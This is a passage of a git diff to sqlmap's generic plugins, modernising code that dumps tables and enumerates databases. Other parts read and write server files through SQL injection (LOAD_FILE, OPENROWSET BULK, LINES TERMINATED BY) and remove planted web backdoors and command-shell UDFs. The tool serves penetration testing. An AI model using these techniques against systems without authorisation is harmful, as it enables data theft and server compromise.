dumpFromTbls = test.replace(" ", "").split(",") + dumpFromTbls = choice.replace(" ", "").split(',') for table, columns in tblData.items(): if table not in dumpFromTbls: continue conf.tbl = table - conf.col = ",".join(column for column in filter(None, sorted(columns))) + colList = [_ for _ in columns if _] + + if conf.exclude: + colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] + + conf.col = ','.join(colList) kb.data.cachedColumns = {} kb.data.dumpedTable = {} @@ -430,10 +588,9 @@ def dumpFoundColumn(self, dbs, foundCols, colConsider): conf.dumper.dbTableValues(data) def dumpFoundTables(self, tables): - message = "do you want to dump tables' entries? [Y/n] " - output = readInput(message, default="Y") + message = "do you want to dump found table(s) entries? [Y/n] " - if output and output[0].lower() != "y": + if not readInput(message, default='Y', boolean=True): return dumpFromDbs = [] @@ -441,17 +598,17 @@ def dumpFoundTables(self, tables): for db, tablesList in tables.items(): if tablesList: - message += "[%s]\n" % db + message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test.lower() == "a": - dumpFromDbs = tables.keys() - elif test.lower() == "q": + if not choice or choice.lower() == 'a': + dumpFromDbs = list(tables.keys()) + elif choice.lower() == 'q': return else: - dumpFromDbs = test.replace(" ", "").split(",") + dumpFromDbs = choice.replace(" ", "").split(',') for db, tablesList in tables.items(): if db not in dumpFromDbs or not tablesList: @@ -459,24 +616,24 @@ def dumpFoundTables(self, tables): conf.db = db dumpFromTbls = [] - message = "which table(s) of database '%s'?\n" % db + message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db) message += "[a]ll (default)\n" for tbl in tablesList: - message += "[%s]\n" % tbl + message += "[%s]\n" % unsafeSQLIdentificatorNaming(tbl) message += "[s]kip\n" message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test.lower() == "a": + if not choice or choice.lower() == 'a': dumpFromTbls = tablesList - elif test.lower() == "s": + elif choice.lower() == 's': continue - elif test.lower() == "q": + elif choice.lower() == 'q': return else: - dumpFromTbls = test.replace(" ", "").split(",") + dumpFromTbls = choice.replace(" ", "").split(',') for table in dumpFromTbls: conf.tbl = table diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py index a537dd469c6..a410816f6e2 100644 --- a/plugins/generic/enumeration.py +++ b/plugins/generic/enumeration.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py index 7ced5df0a40..df7fb110389 100644 --- a/plugins/generic/filesystem.py +++ b/plugins/generic/filesystem.py @@ -1,85 +1,103 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import codecs import os +import sys from lib.core.agent import agent -from lib.core.common import dataToOutFile from lib.core.common import Backend +from lib.core.common import checkFile +from lib.core.common import dataToOutFile from lib.core.common import decloakToTemp -from lib.core.common import decodeHexValue -from lib.core.common import isNumPosStrValue +from lib.core.common import decodeDbmsHexValue from lib.core.common import isListLike +from lib.core.common import isNoneValue +from lib.core.common import isNullValue +from lib.core.common import isNumPosStrValue +from lib.core.common import isStackingAvailable from lib.core.common import isTechniqueAvailable from lib.core.common import readInput +from lib.core.compat import xrange +from lib.core.convert import encodeBase64 +from lib.core.convert import encodeHex +from lib.core.convert import getText +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger -from lib.core.enums import DBMS from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapUndefinedMethod +from lib.core.settings import UNICODE_ENCODING from lib.request import inject -class Filesystem: +class Filesystem(object): """ This class defines generic OS file system functionalities for plugins. """ def __init__(self): - self.fileTblName = "sqlmapfile" + self.fileTblName = "%sfile" % conf.tablePrefix self.tblField = "data" def _checkFileLength(self, localFile, remoteFile, fileRead=False): if Backend.isDbms(DBMS.MYSQL): - lengthQuery = "SELECT LENGTH(LOAD_FILE('%s'))" % remoteFile + lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile elif Backend.isDbms(DBMS.PGSQL) and not fileRead: - lengthQuery = "SELECT LENGTH(data) FROM pg_largeobject WHERE loid=%d" % self.oid + lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid elif Backend.isDbms(DBMS.MSSQL): self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)") - inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)); + inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)) lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName) - localFileSize = os.path.getsize(localFile) + try: + localFileSize = os.path.getsize(localFile) + except OSError: + warnMsg = "file '%s' is missing" % localFile + logger.warning(warnMsg) + localFileSize = 0 if fileRead and Backend.isDbms(DBMS.PGSQL): - logger.info("length of read file %s cannot be checked on PostgreSQL" % remoteFile) + logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile) sameFile = True else: - logger.debug("checking the length of the remote file %s" % remoteFile) + logger.debug("checking the length of the remote file '%s'" % remoteFile) remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) sameFile = None if isNumPosStrValue(remoteFileSize): - remoteFileSize = long(remoteFileSize) + remoteFileSize = int(remoteFileSize) + localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) sameFile = False if localFileSize == remoteFileSize: sameFile = True - infoMsg = "the local file %s and the remote file " % localFile - infoMsg += "%s have the same size" % remoteFile + infoMsg = "the local file '%s' and the remote file " % localFile + infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize) elif remoteFileSize > localFileSize: - infoMsg = "the remote file %s is larger than " % remoteFile - infoMsg += "the local file %s" % localFile + infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize) + infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize) else: - infoMsg = "the remote file %s is smaller than " % remoteFile - infoMsg += "file '%s' (%d bytes)" % (localFile, localFileSize) + infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize) + infoMsg += "file '%s' (%d B)" % (localFile, localFileSize) logger.info(infoMsg) else: sameFile = False - warnMsg = "it looks like the file has not been written, this " - warnMsg += "can occur if the DBMS process' user has no write " - warnMsg += "privileges in the destination path" - logger.warn(warnMsg) + warnMsg = "it looks like the file has not been written (usually " + warnMsg += "occurs if the DBMS process user has no write " + warnMsg += "privileges in the destination path)" + logger.warning(warnMsg) return sameFile @@ -103,20 +121,35 @@ def fileToSqlQueries(self, fcEncodedList): return sqlQueries - def fileEncode(self, fileName, encoding, single): + def fileEncode(self, fileName, encoding, single, chunkSize=256): """ Called by MySQL and PostgreSQL plugins to write a file on the back-end DBMS underlying file system """ - retVal = [] + checkFile(fileName) + with open(fileName, "rb") as f: - content = f.read().encode(encoding).replace("\n", "") + content = f.read() + + return self.fileContentEncode(content, encoding, single, chunkSize) + + def fileContentEncode(self, content, encoding, single, chunkSize=256): + retVal = [] + + if encoding == "hex": + content = encodeHex(content) + elif encoding == "base64": + content = encodeBase64(content) + else: + content = codecs.encode(content, encoding) + + content = getText(content).replace("\n", "") if not single: - if len(content) > 256: - for i in xrange(0, len(content), 256): - _ = content[i:i + 256] + if len(content) > chunkSize: + for i in xrange(0, len(content), chunkSize): + _ = content[i:i + chunkSize] if encoding == "hex": _ = "0x%s" % _ @@ -136,27 +169,27 @@ def fileEncode(self, fileName, encoding, single): return retVal def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False): - output = None + choice = None if forceCheck is not True: message = "do you want confirmation that the local file '%s' " % localFile message += "has been successfully written on the back-end DBMS " - message += "file system (%s)? [Y/n] " % remoteFile - output = readInput(message, default="Y") + message += "file system ('%s')? [Y/n] " % remoteFile + choice = readInput(message, default='Y', boolean=True) - if forceCheck or (output and output.lower() == "y"): + if forceCheck or choice: return self._checkFileLength(localFile, remoteFile) return True def askCheckReadFile(self, localFile, remoteFile): - message = "do you want confirmation that the remote file '%s' " % remoteFile - message += "has been successfully downloaded from the back-end " - message += "DBMS file system? [Y/n] " - output = readInput(message, default="Y") + if not kb.bruteMode: + message = "do you want confirmation that the remote file '%s' " % remoteFile + message += "has been successfully downloaded from the back-end " + message += "DBMS file system? [Y/n] " - if not output or output in ("y", "Y"): - return self._checkFileLength(localFile, remoteFile, True) + if readInput(message, default='Y', boolean=True): + return self._checkFileLength(localFile, remoteFile, True) return None @@ -170,34 +203,34 @@ def stackedReadFile(self, remoteFile): errMsg += "into the specific DBMS plugin" raise SqlmapUndefinedMethod(errMsg) - def unionWriteFile(self, localFile, remoteFile, fileType): + def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): errMsg = "'unionWriteFile' method must be defined " errMsg += "into the specific DBMS plugin" raise SqlmapUndefinedMethod(errMsg) - def stackedWriteFile(self, localFile, remoteFile, fileType): + def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): errMsg = "'stackedWriteFile' method must be defined " errMsg += "into the specific DBMS plugin" raise SqlmapUndefinedMethod(errMsg) - def readFile(self, remoteFiles): + def readFile(self, remoteFile): localFilePaths = [] self.checkDbmsOs() - for remoteFile in remoteFiles.split(","): + for remoteFile in remoteFile.split(','): fileContent = None kb.fileReadMode = True - if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): - debugMsg = "going to read the file with stacked query SQL " + if conf.direct or isStackingAvailable(): + if isStackingAvailable(): + debugMsg = "going to try to read the file with stacked query SQL " debugMsg += "injection technique" logger.debug(debugMsg) fileContent = self.stackedReadFile(remoteFile) elif Backend.isDbms(DBMS.MYSQL): - debugMsg = "going to read the file with a non-stacked query " + debugMsg = "going to try to read the file with non-stacked query " debugMsg += "SQL injection technique" logger.debug(debugMsg) @@ -212,8 +245,9 @@ def readFile(self, remoteFiles): kb.fileReadMode = False - if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL): + if (isNoneValue(fileContent) or isNullValue(fileContent)) and not Backend.isDbms(DBMS.PGSQL): self.cleanup(onlyFileTbl=True) + fileContent = None elif isListLike(fileContent): newFileContent = "" @@ -230,9 +264,9 @@ def readFile(self, remoteFiles): fileContent = newFileContent if fileContent is not None: - fileContent = decodeHexValue(fileContent) + fileContent = decodeDbmsHexValue(fileContent, True) - if fileContent: + if fileContent.strip(): localFilePath = dataToOutFile(remoteFile, fileContent) if not Backend.isDbms(DBMS.PGSQL): @@ -246,7 +280,7 @@ def readFile(self, remoteFiles): localFilePath += " (size differs from remote file)" localFilePaths.append(localFilePath) - else: + elif not kb.bruteMode: errMsg = "no data retrieved" logger.error(errMsg) @@ -255,25 +289,33 @@ def readFile(self, remoteFiles): def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): written = False + checkFile(localFile) + self.checkDbmsOs() if localFile.endswith('_'): - localFile = decloakToTemp(localFile) + localFile = getUnicode(decloakToTemp(localFile)) - if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): - debugMsg = "going to upload the %s file with " % fileType - debugMsg += "stacked query SQL injection technique" + if conf.direct or isStackingAvailable(): + if isStackingAvailable(): + debugMsg = "going to upload the file '%s' with " % fileType + debugMsg += "stacked query technique" logger.debug(debugMsg) written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) self.cleanup(onlyFileTbl=True) elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL): - debugMsg = "going to upload the %s file with " % fileType - debugMsg += "UNION query SQL injection technique" + debugMsg = "going to upload the file '%s' with " % fileType + debugMsg += "UNION query technique" logger.debug(debugMsg) written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck) + elif Backend.isDbms(DBMS.MYSQL): + debugMsg = "going to upload the file '%s' with " % fileType + debugMsg += "LINES TERMINATED BY technique" + logger.debug(debugMsg) + + written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck) else: errMsg = "none of the SQL injection techniques detected can " errMsg += "be used to write files to the underlying file " diff --git a/plugins/generic/fingerprint.py b/plugins/generic/fingerprint.py index 8bddb41f975..38f4775a1b9 100644 --- a/plugins/generic/fingerprint.py +++ b/plugins/generic/fingerprint.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend @@ -11,7 +11,7 @@ from lib.core.enums import OS from lib.core.exception import SqlmapUndefinedMethod -class Fingerprint: +class Fingerprint(object): """ This class defines generic fingerprint functionalities for plugins. """ @@ -40,19 +40,19 @@ def forceDbmsEnum(self): def userChooseDbmsOs(self): warnMsg = "for some reason sqlmap was unable to fingerprint " warnMsg += "the back-end DBMS operating system" - logger.warn(warnMsg) + logger.warning(warnMsg) msg = "do you want to provide the OS? [(W)indows/(l)inux]" while True: - os = readInput(msg, default="W") + os = readInput(msg, default='W').upper() - if os[0].lower() == "w": + if os == 'W': Backend.setOs(OS.WINDOWS) break - elif os[0].lower() == "l": + elif os == 'L': Backend.setOs(OS.LINUX) break else: warnMsg = "invalid value" - logger.warn(warnMsg) + logger.warning(warnMsg) diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py index 9ab4adb7d75..bbb7adc0935 100644 --- a/plugins/generic/misc.py +++ b/plugins/generic/misc.py @@ -1,19 +1,21 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import ntpath import re from lib.core.common import Backend from lib.core.common import hashDBWrite -from lib.core.common import isTechniqueAvailable +from lib.core.common import isStackingAvailable from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import posixToNtSlashes from lib.core.common import readInput +from lib.core.common import singleTimeDebugMessage from lib.core.common import unArrayizeValue from lib.core.data import conf from lib.core.data import kb @@ -22,12 +24,10 @@ from lib.core.enums import DBMS from lib.core.enums import HASHDB_KEYS from lib.core.enums import OS -from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapUnsupportedFeatureException from lib.request import inject -class Miscellaneous: +class Miscellaneous(object): """ This class defines miscellaneous functionalities for plugins. """ @@ -36,6 +36,17 @@ def __init__(self): pass def getRemoteTempPath(self): + if not conf.tmpPath and Backend.isDbms(DBMS.MSSQL): + debugMsg = "identifying Microsoft SQL Server error log directory " + debugMsg += "that sqlmap will use to store temporary files with " + debugMsg += "commands' output" + logger.debug(debugMsg) + + _ = unArrayizeValue(inject.getValue("SELECT SERVERPROPERTY('ErrorLogFileName')", safeCharEncode=False)) + + if _: + conf.tmpPath = ntpath.dirname(_) + if not conf.tmpPath: if Backend.isOs(OS.WINDOWS): if conf.direct: @@ -58,6 +69,8 @@ def getRemoteTempPath(self): conf.tmpPath = normalizePath(conf.tmpPath) conf.tmpPath = ntToPosixSlashes(conf.tmpPath) + singleTimeDebugMessage("going to use '%s' as temporary files directory" % conf.tmpPath) + hashDBWrite(HASHDB_KEYS.CONF_TMP_PATH, conf.tmpPath) return conf.tmpPath @@ -69,25 +82,16 @@ def getVersionFromBanner(self): infoMsg = "detecting back-end DBMS version from its banner" logger.info(infoMsg) - if Backend.isDbms(DBMS.MYSQL): - first, last = 1, 6 - - elif Backend.isDbms(DBMS.PGSQL): - first, last = 12, 6 - - elif Backend.isDbms(DBMS.MSSQL): - first, last = 29, 9 - - else: - raise SqlmapUnsupportedFeatureException("unsupported DBMS") - - query = queries[Backend.getIdentifiedDbms()].substring.query % (queries[Backend.getIdentifiedDbms()].banner.query, first, last) + query = queries[Backend.getIdentifiedDbms()].banner.query if conf.direct: query = "SELECT %s" % query - kb.bannerFp["dbmsVersion"] = unArrayizeValue(inject.getValue(query)) - kb.bannerFp["dbmsVersion"] = (kb.bannerFp["dbmsVersion"] or "").replace(",", "").replace("-", "").replace(" ", "") + kb.bannerFp["dbmsVersion"] = unArrayizeValue(inject.getValue(query)) or "" + + match = re.search(r"\d[\d.-]*", kb.bannerFp["dbmsVersion"]) + if match: + kb.bannerFp["dbmsVersion"] = match.group(0) def delRemoteFile(self, filename): if not filename: @@ -105,7 +109,11 @@ def delRemoteFile(self, filename): def createSupportTbl(self, tblName, tblField, tblType): inject.goStacked("DROP TABLE %s" % tblName, silent=True) - inject.goStacked("CREATE TABLE %s(%s %s)" % (tblName, tblField, tblType)) + + if Backend.isDbms(DBMS.MSSQL) and tblName == self.cmdTblName: + inject.goStacked("CREATE TABLE %s(id INT PRIMARY KEY IDENTITY, %s %s)" % (tblName, tblField, tblType)) + else: + inject.goStacked("CREATE TABLE %s(%s %s)" % (tblName, tblField, tblType)) def cleanup(self, onlyFileTbl=False, udfDict=None, web=False): """ @@ -119,7 +127,10 @@ def cleanup(self, onlyFileTbl=False, udfDict=None, web=False): self.delRemoteFile(self.webStagerFilePath) self.delRemoteFile(self.webBackdoorFilePath) - if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: + if (not isStackingAvailable() or kb.udfFail) and not conf.direct: + return + + if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and kb.copyExecTest: return if Backend.isOs(OS.WINDOWS): @@ -144,16 +155,15 @@ def cleanup(self, onlyFileTbl=False, udfDict=None, web=False): inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True) if Backend.isDbms(DBMS.MSSQL): - return + udfDict = {"master..new_xp_cmdshell": {}} if udfDict is None: - udfDict = self.sysUdfs + udfDict = getattr(self, "sysUdfs", {}) for udf, inpRet in udfDict.items(): message = "do you want to remove UDF '%s'? [Y/n] " % udf - output = readInput(message, default="Y") - if not output or output in ("y", "Y"): + if readInput(message, default='Y', boolean=True): dropStr = "DROP FUNCTION %s" % udf if Backend.isDbms(DBMS.PGSQL): @@ -173,7 +183,7 @@ def cleanup(self, onlyFileTbl=False, udfDict=None, web=False): warnMsg += "saved on the file system can only be deleted " warnMsg += "manually" - logger.warn(warnMsg) + logger.warning(warnMsg) def likeOrExact(self, what): message = "do you want sqlmap to consider provided %s(s):\n" % what diff --git a/plugins/generic/search.py b/plugins/generic/search.py index 49570747901..5ec72f18ff2 100644 --- a/plugins/generic/search.py +++ b/plugins/generic/search.py @@ -1,10 +1,12 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import re + from lib.core.agent import agent from lib.core.common import arrayizeValue from lib.core.common import Backend @@ -16,6 +18,7 @@ from lib.core.common import isTechniqueAvailable from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import safeStringFormat from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf @@ -31,11 +34,13 @@ from lib.core.exception import SqlmapUserQuitException from lib.core.settings import CURRENT_DB from lib.core.settings import METADB_SUFFIX +from lib.core.settings import UPPER_CASE_DBMSES from lib.request import inject -from lib.techniques.brute.use import columnExists -from lib.techniques.brute.use import tableExists +from lib.utils.brute import columnExists +from lib.utils.brute import tableExists +from thirdparty import six -class Search: +class Search(object): """ This class defines search functionalities for plugins. """ @@ -46,7 +51,7 @@ def __init__(self): def searchDb(self): foundDbs = [] rootQuery = queries[Backend.getIdentifiedDbms()].search_db - dbList = conf.db.split(",") + dbList = conf.db.split(',') if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: dbCond = rootQuery.inband.condition2 @@ -59,12 +64,12 @@ def searchDb(self): values = [] db = safeSQLIdentificatorNaming(db) - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: db = db.upper() infoMsg = "searching database" if dbConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) @@ -97,7 +102,7 @@ def searchDb(self): if not values and isInferenceAvailable() and not conf.direct: infoMsg = "fetching number of database" if dbConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) @@ -112,9 +117,9 @@ def searchDb(self): if not isNumPosStrValue(count): warnMsg = "no database" if dbConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' found" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) + logger.warning(warnMsg) continue @@ -144,19 +149,19 @@ def searchTable(self): bruteForce = True if bruteForce: - message = "do you want to use common table existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + message = "do you want to use common table existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB) else "[y/N/q]") + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: - regex = "|".join(conf.tbl.split(",")) + regex = '|'.join(conf.tbl.split(',')) return tableExists(paths.COMMON_TABLES, regex) foundTbls = {} - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') rootQuery = queries[Backend.getIdentifiedDbms()].search_table tblCond = rootQuery.inband.condition dbCond = rootQuery.inband.condition2 @@ -166,29 +171,36 @@ def searchTable(self): values = [] tbl = safeSQLIdentificatorNaming(tbl, True) - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: tbl = tbl.upper() + conf.db = conf.db.upper() if conf.db else conf.db infoMsg = "searching table" - if tblConsider == "1": - infoMsg += "s like" + if tblConsider == '1': + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - if dbCond and conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if dbCond and conf.db: + _ = conf.db.split(',') whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")" infoMsg += " for database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) elif conf.excludeSysDbs: whereDbsQuery = "".join(" AND '%s' != %s" % (unsafeSQLIdentificatorNaming(db), dbCond) for db in self.excludeDbsList) - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg2) + msg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) + logger.info(msg) else: whereDbsQuery = "" + if dbCond and conf.exclude: + whereDbsQuery += " AND %s NOT LIKE '%s'" % (dbCond, re.sub(r"\.[*+]", '%', conf.exclude._original)) + logger.info(infoMsg) tblQuery = "%s%s" % (tblCond, tblCondParam) - tblQuery = tblQuery % tbl + tblQuery = tblQuery % unsafeSQLIdentificatorNaming(tbl) if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: query = rootQuery.inband.query @@ -199,7 +211,7 @@ def searchTable(self): if values and Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): newValues = [] - if isinstance(values, basestring): + if isinstance(values, six.string_types): values = [values] for value in values: dbName = "SQLite" if Backend.isDbms(DBMS.SQLITE) else "Firebird" @@ -224,7 +236,7 @@ def searchTable(self): if len(whereDbsQuery) == 0: infoMsg = "fetching number of databases with table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.info(infoMsg) @@ -235,9 +247,9 @@ def searchTable(self): if not isNumPosStrValue(count): warnMsg = "no databases have table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - logger.warn(warnMsg) + logger.warning(warnMsg) continue @@ -260,20 +272,21 @@ def searchTable(self): if tblConsider == "2": continue else: - for db in conf.db.split(","): + for db in conf.db.split(',') if conf.db else (self.getCurrentDb(),): + db = safeSQLIdentificatorNaming(db) if db not in foundTbls: foundTbls[db] = [] else: dbName = "SQLite" if Backend.isDbms(DBMS.SQLITE) else "Firebird" foundTbls["%s%s" % (dbName, METADB_SUFFIX)] = [] - for db in foundTbls.keys(): + for db in foundTbls: db = safeSQLIdentificatorNaming(db) infoMsg = "fetching number of table" if tblConsider == "1": - infoMsg += "s like" - infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), db) + infoMsg += "s LIKE" + infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) query = rootQuery.blind.count2 @@ -286,10 +299,10 @@ def searchTable(self): if not isNumPosStrValue(count): warnMsg = "no table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) - warnMsg += "in database '%s'" % db - logger.warn(warnMsg) + warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) + logger.warning(warnMsg) continue @@ -298,25 +311,35 @@ def searchTable(self): for index in indexRange: query = rootQuery.blind.query2 + if " ORDER BY " in query: + query = query.replace(" ORDER BY ", "%s ORDER BY " % (" AND %s" % tblQuery)) + elif query.endswith("'%s')"): + query = query[:-1] + " AND %s)" % tblQuery + else: + query += " AND %s" % tblQuery + if Backend.isDbms(DBMS.FIREBIRD): - query = query % index + query = safeStringFormat(query, index) if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD): - query = query % unsafeSQLIdentificatorNaming(db) - - query += " AND %s" % tblQuery + query = safeStringFormat(query, unsafeSQLIdentificatorNaming(db)) if not Backend.isDbms(DBMS.FIREBIRD): query = agent.limitQuery(index, query) foundTbl = unArrayizeValue(inject.getValue(query, union=False, error=False)) - kb.hintValue = foundTbl - foundTbl = safeSQLIdentificatorNaming(foundTbl, True) - foundTbls[db].append(foundTbl) + if not isNoneValue(foundTbl): + kb.hintValue = foundTbl + foundTbl = safeSQLIdentificatorNaming(foundTbl, True) + foundTbls[db].append(foundTbl) + + for db in list(foundTbls.keys()): + if isNoneValue(foundTbls[db]): + del foundTbls[db] if not foundTbls: warnMsg = "no databases contain any of the provided tables" - logger.warn(warnMsg) + logger.warning(warnMsg) return conf.dumper.dbTables(foundTbls) @@ -325,27 +348,28 @@ def searchTable(self): def searchColumn(self): bruteForce = False + self.forceDbmsEnum() + if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: errMsg = "information_schema not available, " errMsg += "back-end DBMS is MySQL < 5.0" bruteForce = True if bruteForce: - message = "do you want to use common column existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + message = "do you want to use common column existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB) else "[y/N/q]") + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: - regex = "|".join(conf.col.split(",")) + regex = '|'.join(conf.col.split(',')) conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS, regex)) message = "do you want to dump entries? [Y/n] " - output = readInput(message, default="Y") - if output and output[0] not in ("n", "N"): + if readInput(message, default='Y', boolean=True): self.dumpAll() return @@ -357,7 +381,11 @@ def searchColumn(self): whereTblsQuery = "" infoMsgTbl = "" infoMsgDb = "" - colList = conf.col.split(",") + colList = conf.col.split(',') + + if conf.exclude: + colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] + origTbl = conf.tbl origDb = conf.db colCond = rootQuery.inband.condition @@ -371,31 +399,43 @@ def searchColumn(self): conf.db = origDb conf.tbl = origTbl - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in 